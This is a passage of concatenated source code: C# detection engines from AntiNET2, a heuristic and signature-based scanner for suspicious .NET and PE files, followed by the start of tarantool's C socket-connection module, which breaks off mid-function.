}
// string like
// 4D 5A 9? 00 03 is sig
// Hex is 2 chars, so need to work on that
public static long IndexOfTest(this byte[] search, string sig)
{
string[] sigParts = sig.Split(' ');
int count = search.Length - sig.Replace(" ", "").Length + 1;
for (int i = 0; i < count; i++)
{
// Problem with this is that it will not work if the first part contains ?
/*if (search[i].ToString("X2") != sigParts[0])
{
continue;
}*/
int j = 0;
for (int a = 0; a < sigParts.Length; a++)
{
string part = sigParts[a];
string testMatch = search[i + a].ToString("X2");
if (testMatch == part || part == "??")
{
j++;
continue;
}
if (part[0] == '?')
{
if (testMatch[1] == part[1])
j++;
}
else if (part[1] == '?')
{
if (testMatch[0] == part[0])
j++;
}
else
{
// No match, break
break;
}
}
if (j == sigParts.Length)
return i;
}
return -1;
}
// Credits to github.com/BahNahNah
// Slower, sadly
public static unsafe long IndexOfTest2(this byte[] search, string sig)
{
var pattern = sig.Split(' ').Select(x =>
{
if (x == "??")
return '?';
return (char)Convert.ToByte(x, 16);
}).ToArray();
fixed (byte* scrArrayPtr = &search[0])
{
var scrEnum = scrArrayPtr;
for (var end = (scrArrayPtr + (search.Length - sig.Length + 1)); scrEnum <= end; scrEnum++)
{
bool found = true;
fixed (char* mPtr = &pattern[0])
{
var mEnum = mPtr;
for (var mEnd = mPtr + pattern.Length; mEnum != mEnd; mEnum++)
{
if (*mEnum == '?')
{
continue;
}
string left = (*mEnum).ToString();
string right = (*scrEnum).ToString("X");
if (left != right)
//if (*(byte*)mEnum != *scrEnum)
{
found = false;
break;
}
}
}
if (found)
return (int)(scrEnum - scrArrayPtr);
scrEnum++;
}
}
return -1;
}
// Credits to github.com/BahNahNah
static unsafe int GetIndexOfScan(byte[] search, byte[] pattern, string match)
{
if (search.Length == 0 || pattern.Length != match.Length || pattern.Length == 0)
return 0;
fixed (byte* scrArrayPtr = &search[0])
{
var scrEnum = scrArrayPtr;
var end = (scrArrayPtr + (search.Length - pattern.Length + 1));
while (scrEnum != end)
{
bool found = true;
for (int pIndex = 0; pIndex < pattern.Length; pIndex++)
{
if (match[pIndex] != '?')
{
if (*(scrEnum + pIndex) != pattern[pIndex])
{
found = false;
break;
}
}
}
if (found)
return (int)(scrEnum - scrArrayPtr);
scrEnum++;
}
}
return -1;
}
#endregion
}
}
<|start_filename|>AntiNET2/Core/Providers/DetectionEngines/Managed/ReflectionDetection.cs<|end_filename|>
using AntiNET2.Core.Models;
using AntiNET2.Core.Models.Database;
using AntiNET2.Core.Providers.Database;
using dnlib.DotNet;
using dnlib.DotNet.Emit;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace AntiNET2.Core.Providers.DetectionEngines.Managed
{
public class ReflectionDetection : IDetectionProcess
{
public AssemblySettings _asm;
public int Detect(AssemblySettings asm)
{
_asm = asm;
int d = 0;
foreach (TypeDef td in asm.Module.GetTypes())
{
foreach (MethodDef md in td.Methods)
{
if (!md.HasBody)
continue;
d += ProcessMethod(md);
}
}
return d;
}
private int ProcessMethod(MethodDef md)
{
int d = 0;
foreach (Instruction inst in md.Body.Instructions)
{
if (inst.OpCode == OpCodes.Calli)
{
// You shouldn't ever come across calli when an obfuscator isn't present... no?
_asm.AddDetection("Call", new Reason("Call", "Calli Present, could be a sign of hiding behind an obfuscator"));
d++;
}
if (inst.OpCode != OpCodes.Call && inst.OpCode != OpCodes.Callvirt)
{
continue;
}
foreach (ReflectionEntry callEntry in DetectionDatabase.Calls)
{
if (inst.ToString().ToLower().Contains(callEntry.Trigger.ToLower()))
{
_asm.AddDetection(callEntry.Category, new Reason(callEntry.Category, callEntry.Description));
d++;
}
}
}
return d;
}
}
}
<|start_filename|>AntiNET2/Core/Providers/DetectionEngines/Native/SectionDetection.cs<|end_filename|>
using AntiNET2.Core.Models;
using dnlib.PE;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace AntiNET2.Core.Providers.DetectionEngines.Native
{
public class SectionDetection : IDetectionProcess
{
private PEImage mod;
public int Detect(AssemblySettings asm)
{
int d = 0;
mod = asm.NativeImage;
// Check for starting with .
// Check for only top section headers
// .rsrc, .text, .data, .rdata, .reloc, .idata, .tls, .bss
foreach (var sect in mod.ImageSectionHeaders)
{
string dispName = sect.DisplayName;
uint attrs = sect.Characteristics;
if (!dispName.StartsWith("."))
{
asm.AddDetection("Sections", new Reason("Sections", string.Format("Section {0} does not start with a dot. Could be invalid section.", dispName)));
d++;
}
bool hasInvalidAttrs = false;
switch (dispName)
{
case ".text":
if (attrs != 0x60000020)
{
hasInvalidAttrs = true;
}
break;
case ".rsrc":
case ".rdata":
if (attrs != 0x40000040)
{
hasInvalidAttrs = true;
}
break;
case ".idata":
case ".data":
if (attrs != 0xC0000040)
{
hasInvalidAttrs = true;
}
break;
case ".reloc":
if (attrs != 0x42000040)
{
hasInvalidAttrs = true;
}
break;
case ".bss":
if (attrs != 0xC0000080)
{
hasInvalidAttrs = true;
}
break;
default:
asm.AddDetection("Sections", new Reason("Sections", string.Format("Section {0} is not a common section name. Could contain malicious content.", dispName)));
d++;
break;
}
if (hasInvalidAttrs)
{
asm.AddDetection("Sections", new Reason("Sections", string.Format("Section {0} does not have the correct attributes. Could be spoofed.", dispName)));
}
}
return d;
}
}
}
<|start_filename|>AntiNET2/Core/Models/Detection.cs<|end_filename|>
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace AntiNET2.Core.Models
{
public class Detection
{
public string DetectionType = string.Empty;
public int TotalDetections = 0;
public List<Reason> DetectionReasons = new List<Reason>();
}
}
<|start_filename|>AntiNET2/Core/Providers/DetectionEngines/Managed/PInvokeDetection.cs<|end_filename|>
using AntiNET2.Core.Models;
using AntiNET2.Core.Models.Database;
using AntiNET2.Core.Providers.Database;
using dnlib.DotNet;
using dnlib.DotNet.Emit;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace AntiNET2.Core.Providers.DetectionEngines.Managed
{
public class PInvokeDetection : IDetectionProcess
{
public AssemblySettings _asm;
private List<string> commonUsed = new List<string>() { "kernel32.dll", "gdi32.dll", "user32.dll", "mscoree.dll" };
public int Detect(AssemblySettings asm)
{
_asm = asm;
int d = 0;
foreach (TypeDef td in asm.Module.GetTypes())
{
foreach (MethodDef md in td.Methods)
{
if (!md.IsPinvokeImpl)
continue;
d += ProcessMethod(md);
}
}
return d;
}
private int ProcessMethod(MethodDef md)
{
int d = 0;
if (!commonUsed.Contains(md.ImplMap.Module.Name.ToString()))
{
_asm.AddDetection("PInvoke", new Reason("PInvoke", string.Format("Uncommon PInvoke dll referenced: {0}", md.ImplMap.Module.Name.ToString())));
d++;
return d;
}
foreach (PInvokeEntry pEntry in DetectionDatabase.Natives)
{
if (md.ImplMap.Name.StartsWith(pEntry.Trigger, StringComparison.InvariantCultureIgnoreCase))
{
_asm.AddDetection(pEntry.Category, new Reason(pEntry.Category, pEntry.Description));
d++;
}
}
return d;
}
}
}
<|start_filename|>AntiNET2/Scanner.cs<|end_filename|>
using AntiNET2.Core.Models;
using AntiNET2.Core.Providers.Database;
using AntiNET2.Core.Providers.DetectionEngines.Managed;
using AntiNET2.Core.Providers.DetectionEngines.Native;
using dnlib.DotNet;
using dnlib.PE;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace AntiNET2
{
public static class Scanner
{
public static List<Detection> Scan(string file, out int detectionCount)
{
AssemblySettings asmSettings = new AssemblySettings();
bool isNet = true;
try
{
asmSettings.Module = ModuleDefMD.Load(file);
}
catch (Exception)
{
isNet = false;
}
if (!isNet)
{
try
{
asmSettings.NativeImage = new PEImage(file);
}
catch (Exception ex)
{
// Cannot continue execution
Console.WriteLine(ex);
Console.ReadLine();
detectionCount = 0;
return new List<Detection>();
}
}
else
{
asmSettings.NativeImage = asmSettings.Module.MetaData.PEImage as PEImage;
}
List<IDetectionProcess> dp = new List<IDetectionProcess>();
if (isNet)
{
dp.Add(new ResourceDetection());
dp.Add(new StringDetection());
dp.Add(new ReflectionDetection());
dp.Add(new PInvokeDetection());
}
dp.Add(new EOFDetection());
dp.Add(new SectionDetection());
dp.Add(new SignatureDetection());
int totalDetections = dp.Sum(x => x.Detect(asmSettings));
DetectionDatabase.Save();
detectionCount = totalDetections;
return asmSettings.TotalDetections;
}
}
}
<|start_filename|>AntiNET2/Core/Helpers/ByteScan.cs<|end_filename|>
using System;
using System.Linq;
using Newtonsoft.Json;
using Newtonsoft.Json.Serialization;
namespace AntiNET2.Core.Helpers
{
/// <summary>
/// BahNahNah
/// </summary>
public static unsafe class ByteScan
{
/// <summary>
/// Example sig:
/// 01 02 ?3 04
/// will match with
/// 01 02 A3 04
/// 01 02 03 04
/// but not with
/// 01 02 3A 04
/// A0 02 3A 04
/// etc.
/// </summary>
/// <param name="scan">Bytes to scan</param>
/// <param name="sig">Byte sig</param>
/// <returns>Index of scan array where pattern match. -1 on failure.</returns>
public static int GetIndexOfSig(byte[] scan, string sig) => CompileSig(sig).Scan(scan);
public static Sig CompileSig(string sig)
{
var cArray = sig.Split(' ').Select(c => {
ushort flag = 0;
if (c == "??")
{
return flag;
}
if (c[0] != '?')
{ //LEFT
flag |= 0xF0;
}
if (c[1] != '?')
{ //RIGHT
flag |= 0x0F;
}
c = c.Replace('?', '0');
flag |= (ushort)((Convert.ToByte(c, 16) & flag) << 8);
return flag;
}).ToArray();
return new Sig(cArray);
}
public class Sig
{
[JsonProperty("SigFlags")]
private ushort[] SigFlags;
public Sig(ushort[] _sc)
{
SigFlags = _sc;
}
public int Scan(byte[] scan)
{
if (scan.Length < SigFlags.Length)
return -1;
fixed (byte* scrArrayPtr = &scan[0])
{
var scrEnum = scrArrayPtr;
var end = (scrArrayPtr + (scan.Length - SigFlags.Length + 1));
while (scrEnum != end)
{
bool found = true;
for (int pIndex = 0; pIndex < SigFlags.Length; pIndex++)
{
ushort flag = SigFlags[pIndex];
var current = *(scrEnum + pIndex);
if (((current & flag) ^ (flag >> 8)) != 0)
{
found = false;
break;
}
}
if (found)
return (int)(scrEnum - scrArrayPtr);
scrEnum++;
}
}
return -1;
}
}
}
}
<|start_filename|>AntiNET2/Core/Models/IDetectionEntry.cs<|end_filename|>
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace AntiNET2.Core.Models
{
public interface IDetectionEntry
{
string Category { get; set; }
string Description { get; set; }
string Trigger { get; set; }
object Tag { get; set; }
}
}
<|start_filename|>AntiNET2/Core/Providers/DetectionEngines/Native/SignatureDetection.cs<|end_filename|>
using AntiNET2.Core.Models;
using AntiNET2.Core.Models.Database;
using AntiNET2.Core.Providers.Database;
using AntiNET2.Core.Extensions;
using dnlib.DotNet;
using dnlib.DotNet.Emit;
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Diagnostics;
using static AntiNET2.Core.Helpers.ByteScan;
namespace AntiNET2.Core.Providers.DetectionEngines.Native
{
public class SignatureDetection : IDetectionProcess
{
private AssemblySettings _asm;
public int Detect(AssemblySettings asm)
{
_asm = asm;
int d = 0;
//asm.NativeImage.UnsafeDisableMemoryMappedIO();
try
{
byte[] file = File.ReadAllBytes(asm.NativeImage.FileName);
foreach (SignatureEntry sig in DetectionDatabase.Signatures)
{
long sigIndex = ((Sig)sig.Tag).Scan(file);
if (sigIndex == -1)
{
continue;
}
// Should I insert the sig Category here instead of "Signature"?
asm.AddDetection("Signature", new Reason("Signature", string.Format("Matched {0} ({2}) at offset 0x{1}", sig.Trigger, sigIndex.ToString("X2"), sig.Description)));
d++;
}
}
catch (Exception)
{
// File access issue?
asm.AddDetection("Signature", new Reason("Signature", "Error when processing signatures"));
d++;
}
return d;
}
}
}
<|start_filename|>AntiNET2/Core/Models/Database/SignatureEntry.cs<|end_filename|>
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace AntiNET2.Core.Models.Database
{
public class SignatureEntry : IDetectionEntry
{
public string Category { get; set; }
public string Description { get; set; }
public string Trigger { get; set; }
public object Tag { get; set; }
}
}
<|start_filename|>AntiNET2/Core/Providers/Database/DetectionDatabase.cs<|end_filename|>
using AntiNET2.Core.Helpers;
using AntiNET2.Core.Models;
using AntiNET2.Core.Models.Database;
using AntiNET2.Core.Providers.Database;
using Newtonsoft.Json;
using Newtonsoft.Json.Linq;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace AntiNET2.Core.Providers.Database
{
/// <summary>
/// Credits to BahNahNah for curing the eye melting mess!
/// </summary>
public static class DetectionDatabase
{
public static List<ReflectionEntry> Calls => Database.Calls;
public static List<StringEntry> Strings => Database.Strings;
public static List<PInvokeEntry> Natives => Database.Natives;
public static List<SignatureEntry> Signatures => Database.Signatures;
private static DatabaseInfo Database;
static DetectionDatabase()
{
if (!File.Exists("db.json"))
{
Database = new DatabaseInfo();
CreateData();
Save();
}
else
{
Database = JsonConvert.DeserializeObject<DatabaseInfo>(File.ReadAllText("db.json"));
}
// This has to happen no matter whether it is just created, or just loaded
// Multiple methods like this will more than likely be made for other things that require 'Tag' to be used.
LoadSignatures();
}
public static void Save() => File.WriteAllText("db.json", JsonConvert.SerializeObject(Database));
private static void CreateData()
{
Database.Calls = new List<ReflectionEntry>();
Database.Signatures = new List<SignatureEntry>();
Database.Natives = new List<PInvokeEntry>();
Database.Strings = new List<StringEntry>();
/*for (int i = 0; i < 5000; i++)
{
Signatures.Add(new SignatureEntry() { Trigger = "0E 1F BA 0E ?? B4 09 CD ?? B8 01 ?? CD 21", Category = "Test", Description = "Test1" });
Signatures.Add(new SignatureEntry() { Trigger = "?? 29 D6 F4 3F 14 DE AB F1 84 9B 6A E3 1B ?? 02 ?? 7A AF B6 13 4E E3 83 B9", Category = "Test", Description = "Test2" });
Signatures.Add(new SignatureEntry() { Trigger = "4D 5A 90 0? 03", Category = "Test", Description = "Test3" });
}*/
}
public static void AddDetection(IDetectionEntry entry)
{
if (entry is ReflectionEntry)
{
Database.Calls.Add(entry as ReflectionEntry);
}
else if (entry is SignatureEntry)
{
Database.Signatures.Add(entry as SignatureEntry);
}
else if (entry is PInvokeEntry)
{
Database.Natives.Add(entry as PInvokeEntry);
}
else if (entry is StringEntry)
{
Database.Strings.Add(entry as StringEntry);
}
}
private static void LoadSignatures()
{
for (int i = 0; i < Signatures.Count; i++)
{
if (Signatures[i].Tag == null)
{
Signatures[i].Tag = ByteScan.CompileSig(Signatures[i].Trigger);
}
else if (Signatures[i].Tag.GetType().Name != "Sig")
{
string contents = ((JToken)Signatures[i].Tag).ToString();
ByteScan.Sig sg = JsonConvert.DeserializeObject<ByteScan.Sig>(contents);
Signatures[i].Tag = sg;
}
}
}
}
}
<|start_filename|>AntiNET2/Core/Providers/DetectionEngines/Native/EOFDetection.cs<|end_filename|>
using AntiNET2.Core.Models;
using dnlib.DotNet;
using dnlib.PE;
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using AntiNET2.Core.Extensions;
namespace AntiNET2.Core.Providers.DetectionEngines.Native
{
public class EOFDetection : IDetectionProcess
{
private PEImage mod;
public int Detect(AssemblySettings asm)
{
int d = 0;
mod = asm.NativeImage;
var lastSec = mod.ImageSectionHeaders.Last();
var eofOffset = lastSec.PointerToRawData + lastSec.SizeOfRawData;
using (var pe = mod.CreateFullStream())
{
// Check whether it's got EOF anyway
if (pe.Length <= eofOffset)
{
return d;
}
if (pe.Length > eofOffset + 8)
{
pe.Position = eofOffset;
byte[] eof = pe.ReadBytes(8);
d += eof.SigDetection(asm, "End of File");
}
asm.AddDetection("End of File", new Reason("End of File", "End of File data detected, could be storage for malicious content or settings"));
d++;
}
return d;
}
}
}
<|start_filename|>AntiNET2/Core/Providers/DetectionEngines/Managed/ResourceDetection.cs<|end_filename|>
using AntiNET2.Core.Models;
using dnlib.DotNet;
using System;
using System.Collections;
using System.Collections.Generic;
using System.Drawing;
using System.Linq;
using System.Resources;
using System.Text;
using System.Threading.Tasks;
using AntiNET2.Core.Extensions;
using AntiNET2.Core.Helpers;
namespace AntiNET2.Core.Providers.DetectionEngines.Managed
{
public class ResourceDetection : IDetectionProcess
{
private Random r = new Random();
private AssemblySettings _asm;
private Dictionary<int, Resource> sizeHandler = new Dictionary<int, Resource>();
private List<string> manifestNames = new List<string>();
private List<string> readerNames = new List<string>();
public int Detect(AssemblySettings asm)
{
_asm = asm;
ModuleDefMD mod = asm.Module;
int d = 0;
foreach (Resource res in mod.Resources)
{
manifestNames.Add(res.Name);
}
foreach (Resource res in mod.Resources)
{
if (res.ResourceType != ResourceType.Embedded)
continue;
EmbeddedResource ebr = res as EmbeddedResource;
TypeDef assoc = GetAssociatedType(mod, ebr.Name);
if (assoc == null)
{
asm.AddDetection("Resources", new Reason("Resources", "Associated type with the resource was not found"));
d++;
}
ResourceReader reader = null;
try
{
reader = new ResourceReader(ebr.GetResourceStream());
}
catch (Exception)
{
// Probably null or such
}
if (reader == null)
{
asm.AddDetection("Resources", new Reason("Resources", "Resource is a manifest resource, could contain malicious details."));
d++;
if (ebr.GetResourceData().Length > 32)
{
d += ByteTests(ebr.GetResourceData(), ebr);
}
d += NameTests(ebr.Name, ebr, manifestNames);
}
else
{
foreach (DictionaryEntry a in reader)
{
readerNames.Add((string)a.Key);
}
foreach (DictionaryEntry a in reader)
{
if (a.Value is byte[])
{
byte[] b = a.Value as byte[];
d += ByteTests(b, ebr);
}
if (a.Value is Bitmap)
{
// Icon check, icons generally have the same width & height
Bitmap bit = a.Value as Bitmap;
if (bit.Size.Height != bit.Size.Width)
{
asm.AddDetection("Resources", new Reason("Resources", "Bitmap Resource was not equal dimensions, could be steganography."));
d++;
}
}
d += NameTests(a.Key as string, ebr, readerNames);
}
}
readerNames.Clear();
}
return d;
}
private int ByteTests(byte[] array, EmbeddedResource ebr)
{
int d = 0;
if (array.Length > 300000)
{
_asm.AddDetection("Resources", new Reason("Resources", "Large resource was found, larger than 300KB"));
d++;
}
if (sizeHandler.ContainsKey(array.Length))
{
_asm.AddDetection("Resources", new Reason("Resources", "Another resource has the same data/length."));
d++;
}
else
{
sizeHandler.Add(array.Length, ebr);
}
if (array.Length > 8)
{
d += array.SigDetection(_asm, "Resources");
}
return d;
}
private int NameTests(string resEntryName, EmbeddedResource ebr, List<string> testAgainst)
{
int d = 0;
string cToReader = testAgainst[r.Next(testAgainst.Count - 1)];
if (cToReader != resEntryName)
{
int readerComp = LevenshteinDistance.Compute(ebr.Name, cToReader);
if (readerComp < 5)
{
_asm.AddDetection("Resources", new Reason("Resources", "Resource naming was consistent across others. Could mean split resources."));
d++;
}
}
return d;
}
private TypeDef GetAssociatedType(ModuleDefMD mod, string name)
{
foreach (TypeDef td in mod.Types)
{
if (td.FullName.Contains(name.Replace(".resources", "")))
{
return td;
}
}
return null;
}
}
}
<|start_filename|>AntiNET2/Core/Providers/Database/DatabaseInfo.cs<|end_filename|>
using AntiNET2.Core.Models.Database;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace AntiNET2.Core.Providers.Database
{
internal class DatabaseInfo
{
public List<ReflectionEntry> Calls { get; set; }
public List<StringEntry> Strings { get; set; }
public List<PInvokeEntry> Natives { get; set; }
public List<SignatureEntry> Signatures { get; set; }
}
}
<|start_filename|>AntiNET2/Core/Providers/DetectionEngines/Managed/StringDetection.cs<|end_filename|>
using AntiNET2.Core.Models;
using AntiNET2.Core.Models.Database;
using AntiNET2.Core.Providers.Database;
using dnlib.DotNet;
using dnlib.DotNet.Emit;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace AntiNET2.Core.Providers.DetectionEngines.Managed
{
public class StringDetection : IDetectionProcess
{
private AssemblySettings _asm;
public int Detect(AssemblySettings asm)
{
_asm = asm;
int d = 0;
foreach (TypeDef td in asm.Module.GetTypes())
{
foreach (MethodDef md in td.Methods)
{
if (!md.HasBody)
continue;
d += ProcessMethod(md);
}
}
return d;
}
private int ProcessMethod(MethodDef md)
{
int d = 0;
foreach (Instruction inst in md.Body.Instructions)
{
if (inst.OpCode == OpCodes.Ldstr)
{
string data = inst.Operand as string;
foreach (StringEntry pEntry in DetectionDatabase.Strings)
{
if (data.ToLower().Contains(pEntry.Trigger.ToLower()))
{
_asm.AddDetection("ManagedStrings", new Reason("ManagedStrings", pEntry.Description));
d++;
}
}
}
}
return d;
}
}
}
<|start_filename|>AntiNET2/Core/Models/IDetectionProcess.cs<|end_filename|>
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace AntiNET2.Core.Models
{
interface IDetectionProcess
{
int Detect(AssemblySettings asm);
}
}
| Panthere/AntiNET |
<|start_filename|>tnt/tnt_io.c<|end_filename|>
/*
* Redistribution and use in source and binary forms, with or
* without modification, are permitted provided that the following
* conditions are met:
*
* 1. Redistributions of source code must retain the above
* copyright notice, this list of conditions and the
* following disclaimer.
*
* 2. Redistributions in binary form must reproduce the above
* copyright notice, this list of conditions and the following
* disclaimer in the documentation and/or other materials
* provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY <COPYRIGHT HOLDER> ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
* TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
* A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL
* <COPYRIGHT HOLDER> OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
* INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
* SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
* BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
* LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF
* THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
/* need this to get IOV_MAX on some platforms. */
#ifndef __need_IOV_MAX
#define __need_IOV_MAX
#endif
#include <limits.h>
#include <stdlib.h>
#include <stdio.h>
#include <stdarg.h>
#include <string.h>
#include <stdbool.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <netinet/in.h>
#include <sys/poll.h>
#include <sys/un.h>
#include <netinet/tcp.h>
#include <netdb.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <tarantool/tnt_net.h>
#include <tarantool/tnt_io.h>
#include <uri.h>
#if !defined(MIN)
# define MIN(a, b) (a) < (b) ? (a) : (b)
#endif /* !defined(MIN) */
#define TIMEVAL_TO_MSEC(tv) ((tv).tv_sec * 1000 + (tv).tv_usec / 1000)
#define TIMEVAL_DIFF_MSEC(tv1, tv2) (((tv1).tv_sec - (tv2).tv_sec) * 1000 + \
((tv1).tv_usec - (tv2).tv_usec) / 1000)
static enum tnt_error
tnt_io_setopts(struct tnt_stream_net *s);
static enum tnt_error
tnt_io_resolve(struct addrinfo **addr_info_p,
const char *hostname, const char *port)
{
struct addrinfo *addr_info = NULL;
struct addrinfo hints;
memset(&hints, 0, sizeof(hints));
hints.ai_socktype = SOCK_STREAM;
hints.ai_protocol = IPPROTO_TCP;
if (getaddrinfo(hostname, port, &hints, &addr_info) == 0 &&
addr_info != NULL) {
*addr_info_p = addr_info;
return TNT_EOK;
}
return TNT_ERESOLVE;
}
static enum tnt_error
tnt_io_nonblock(struct tnt_stream_net *s, int set)
{
int flags = fcntl(s->fd, F_GETFL);
if (flags == -1) {
s->errno_ = errno;
return TNT_ESYSTEM;
}
if (set)
flags |= O_NONBLOCK;
else
flags &= ~O_NONBLOCK;
if (fcntl(s->fd, F_SETFL, flags) == -1) {
s->errno_ = errno;
return TNT_ESYSTEM;
}
return TNT_EOK;
}
/** Waiting for connection while handling signal events. */
static enum tnt_error
tnt_io_connect_do(struct tnt_stream_net *s, struct sockaddr *addr,
socklen_t addr_size)
{
/* setting nonblock */
enum tnt_error result = tnt_io_nonblock(s, 1);
if (result != TNT_EOK)
return result;
if (connect(s->fd, (struct sockaddr*)addr, addr_size) != -1)
return TNT_EOK;
if (errno == EINPROGRESS) {
/* get start connect time */
struct timeval start_connect;
if (gettimeofday(&start_connect, NULL) == -1) {
s->errno_ = errno;
return TNT_ESYSTEM;
}
/* set initial timer */
int timeout = TIMEVAL_TO_MSEC(s->opt.tmout_connect);
while (1) {
struct pollfd fds[1];
fds[0].fd = s->fd;
fds[0].events = POLLOUT;
int ret = poll(fds, 1, timeout);
if (ret == -1) {
if (errno == EINTR || errno == EAGAIN) {
/* get current time */
struct timeval curr;
if (gettimeofday(&curr, NULL) == -1) {
s->errno_ = errno;
return TNT_ESYSTEM;
}
/* check timeout */
int passed_time = TIMEVAL_DIFF_MSEC(
curr, start_connect);
if (passed_time >= timeout) {
/* timeout */
return TNT_ETMOUT;
}
} else {
s->errno_ = errno;
return TNT_ESYSTEM;
}
} else if (ret == 0) {
/* timeout */
return TNT_ETMOUT;
} else {
/* we have a event on socket */
break;
}
}
/* checking error status */
int opt = 0;
socklen_t len = sizeof(opt);
if ((getsockopt(s->fd, SOL_SOCKET, SO_ERROR,
&opt, &len) == -1) || opt) {
s->errno_ = (opt) ? opt : errno;
return TNT_ESYSTEM;
}
} else {
s->errno_ = errno;
return TNT_ESYSTEM;
}
/* setting block */
result = tnt_io_nonblock(s, 0);
if (result != TNT_EOK)
return result;
return TNT_EOK;
}
static enum tnt_error
tnt_io_connect_tcp(struct tnt_stream_net *s, const char *host, const char *port)
{
/* resolving address */
struct addrinfo *addr_info = NULL;
enum tnt_error result = tnt_io_resolve(&addr_info, host, port);
if (result != TNT_EOK)
goto out;
struct addrinfo *addr;
for (addr = addr_info; addr != NULL; addr = addr->ai_next) {
s->fd = socket(addr->ai_family, addr->ai_socktype,
addr->ai_protocol);
if (s->fd < 0) {
s->errno_ = errno;
result = TNT_ESYSTEM;
continue;
}
result = tnt_io_setopts(s);
if (result != TNT_EOK) {
tnt_io_close(s);
continue;
}
result = tnt_io_connect_do(s, addr->ai_addr, addr->ai_addrlen);
if (result != TNT_EOK) {
tnt_io_close(s);
continue;
}
break;
}
out:
if (addr_info != NULL)
freeaddrinfo(addr_info);
return result;
}
static enum tnt_error
tnt_io_connect_unix(struct tnt_stream_net *s, const char *path)
{
s->fd = socket(PF_UNIX, SOCK_STREAM, 0);
if (s->fd < 0) {
s->errno_ = errno;
return TNT_ESYSTEM;
}
enum tnt_error result = tnt_io_setopts(s);
if (result != TNT_EOK) {
tnt_io_close(s);
return result;
}
struct sockaddr_un addr;
memset(&addr, 0, sizeof(struct sockaddr_un));
addr.sun_family = AF_UNIX;
strcpy(addr.sun_path, path);
if (connect(s->fd, (struct sockaddr*)&addr, sizeof(addr)) != -1)
return TNT_EOK;
s->errno_ = errno;
tnt_io_close(s);
return TNT_ESYSTEM;
}
static enum tnt_error tnt_io_xbufmax(struct tnt_stream_net *s, int opt, int min) {
int max = 128 * 1024 * 1024;
if (min == 0)
min = 16384;
unsigned int avg = 0;
while (min <= max) {
avg = ((unsigned int)(min + max)) / 2;
if (setsockopt(s->fd, SOL_SOCKET, opt, &avg, sizeof(avg)) == 0)
min = avg + 1;
else
max = avg - 1;
}
return TNT_EOK;
}
static enum tnt_error tnt_io_setopts(struct tnt_stream_net *s) {
int opt = 1;
if (s->opt.uri->host_hint != URI_UNIX) {
if (setsockopt(s->fd, IPPROTO_TCP, TCP_NODELAY, &opt, sizeof(opt)) == -1)
goto error;
}
tnt_io_xbufmax(s, SO_SNDBUF, s->opt.send_buf);
tnt_io_xbufmax(s, SO_RCVBUF, s->opt.recv_buf);
if (setsockopt(s->fd, SOL_SOCKET, SO_SNDTIMEO,
&s->opt.tmout_send, sizeof(s->opt.tmout_send)) == -1)
goto error;
if (setsockopt(s->fd, SOL_SOCKET, SO_RCVTIMEO,
&s->opt.tmout_recv, sizeof(s->opt.tmout_recv)) == -1)
goto error;
return TNT_EOK;
error:
s->errno_ = errno;
return TNT_ESYSTEM;
}
enum tnt_error
tnt_io_connect(struct tnt_stream_net *s)
{
enum tnt_error result;
struct uri *uri = s->opt.uri;
switch (uri->host_hint) {
case URI_NAME:
case URI_IPV4:
case URI_IPV6: {
char host[128];
const char *port = uri->service == NULL ? "3301" :
uri->service;
memcpy(host, uri->host, uri->host_len);
host[uri->host_len] = '\0';
result = tnt_io_connect_tcp(s, host, port);
break;
}
case URI_UNIX: {
char service[128];
memcpy(service, uri->service, uri->service_len);
service[uri->service_len] = '\0';
result = tnt_io_connect_unix(s, service);
break;
}
default:
result = TNT_EFAIL;
}
if (result != TNT_EOK)
return result;
s->connected = 1;
return TNT_EOK;
}
void tnt_io_close(struct tnt_stream_net *s)
{
if (s->fd > 0) {
close(s->fd);
s->fd = -1;
}
s->connected = 0;
}
ssize_t tnt_io_flush(struct tnt_stream_net *s) {
if (s->sbuf.off == 0)
return 0;
ssize_t rc = tnt_io_send_raw(s, s->sbuf.buf, s->sbuf.off, 1);
if (rc == -1)
return -1;
s->sbuf.off = 0;
return rc;
}
ssize_t
tnt_io_send_raw(struct tnt_stream_net *s, const char *buf, size_t size, int all)
{
size_t off = 0;
do {
ssize_t r;
if (s->sbuf.tx) {
r = s->sbuf.tx(&s->sbuf, buf + off, size - off);
} else {
do {
